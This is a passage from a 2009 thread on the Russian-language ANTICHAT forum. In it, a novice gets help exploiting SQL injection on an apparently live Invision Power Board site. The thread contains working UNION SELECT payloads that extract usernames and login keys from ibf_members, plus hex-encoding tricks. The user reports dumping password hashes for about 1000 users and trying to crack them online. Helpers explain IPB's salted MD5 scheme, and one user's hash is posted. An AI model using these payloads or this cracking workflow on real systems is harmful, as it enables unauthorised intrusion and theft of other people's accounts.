HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6491  
Старый 07.04.2009, 20:56
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541

Репутация: 5
По умолчанию

Цитата:
Сообщение от Kraneg  
massovka
Код:
concat(name,0x3a3a,member_login_key),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+where+name=NICK/*
Где NICK - это ник того кого ты хочешь вывести... вроде так если не ошибаюсь!
p.s. пробелов там нет =)
Вот что пише

Unknown column 'bybyby' in 'where clause
 
Ответить с цитированием

  #6492  
Старый 07.04.2009, 21:00
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541

Репутация: 5
По умолчанию

Цитата:
Сообщение от ph1l1ster  
Код:
where+name='NICK'
так лучше. если с ошибкой то NICK в хексе и без кавычек.

/index.php?showtopic=-1+union+select+1,concat(name,0x3a3a,member_login_k ey),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+where+na me=0x627962796279/*


Ответ пусто
 
Ответить с цитированием

  #6493  
Старый 07.04.2009, 21:04
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541

Репутация: 5
По умолчанию

Цитата:
Сообщение от massovka  
/index.php?showtopic=-1+union+select+1,concat(name,0x3a3a,member_login_k ey),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+where+na me=0x627962796279/*


Ответ пусто

Получилось увидел! Но возник 2 вопрос того кого я ищу нет! Но я точно знаю что такой юзер есть я сегодня его сам зарегистрировал! Может он вдругой базе? или как?
 
Ответить с цитированием

  #6494  
Старый 07.04.2009, 21:07
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию

massovka, попобуй поищи по id, может у тебягде ошибка проверяй внимательней!
 
Ответить с цитированием

  #6495  
Старый 07.04.2009, 21:22
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541

Репутация: 5
По умолчанию

Цитата:
Сообщение от ph1l1ster  
massovka, попобуй поищи по id, может у тебягде ошибка проверяй внимательней!
Masterok 0x4d61737465726f6b
SpideR 0x537069646552

В базе порядка 1000 юзеров я вот взял те которые выше перевел как вы сказали! нахожу их без проблем

Сегодня днем зарегил bybyby(захожу по дним на сайте он есть 100%) ищу его как мне сказали выше ПУСТО

Проблема втом что у меня есть хэш всех юзеров я вчера до 5 утра начал перебирать http://hash.insidepro.com/index.php вот в этой базе! из 300 человек ни одного стндартного паролья Я В ШОКЕ!

Вот и зарегил сегодня bybyby посмотреть как он шыфруется!

и вот трабл его не могу в базе найти! Может там еще база с юзерами есть?
 
Ответить с цитированием

  #6496  
Старый 07.04.2009, 21:25
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Цитата:
Сообщение от massovka  
Проблема втом что у меня есть хэш всех юзеров я вчера до 5 утра начал перебирать http://hash.insidepro.com/index.php вот в этой базе! из 300 человек ни одного стндартного паролья Я В ШОКЕ!
Уверен, что там мд5?
Если он, то уверен, что там не двойное шифрование?
 
Ответить с цитированием

  #6497  
Старый 07.04.2009, 21:44
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию

massovka, md5(md5(salt)md5(pass))
 
Ответить с цитированием

  #6498  
Старый 07.04.2009, 22:42
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541

Репутация: 5
По умолчанию

Цитата:
Сообщение от wildshaman  
Уверен, что там мд5?
Если он, то уверен, что там не двойное шифрование?

Sofiya::659a4ba8be228cf0d54db65a213cf1fe

вот один из примеров! А так как я новичек незнаю двойной или не двойной он кто подскажет тому спасибо
 
Ответить с цитированием

  #6499  
Старый 07.04.2009, 22:46
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию

Цитата:
Сообщение от massovka  
Sofiya::659a4ba8be228cf0d54db65a213cf1fe

вот один из примеров! А так как я новичек незнаю двойной или не двойной он кто подскажет тому спасибо
какая версия ipb?

1 - md5($pass)
2 - md5(md5($salt).md5($pass))
 
Ответить с цитированием

вот
  #6500  
Старый 07.04.2009, 23:11
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541

Репутация: 5
По умолчанию вот

Цитата:
Сообщение от ph1l1ster  
какая версия ipb?

- 5.0.45

1 - md5($pass)
2 - md5(md5($salt).md5($pass))

- 5.0.45
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ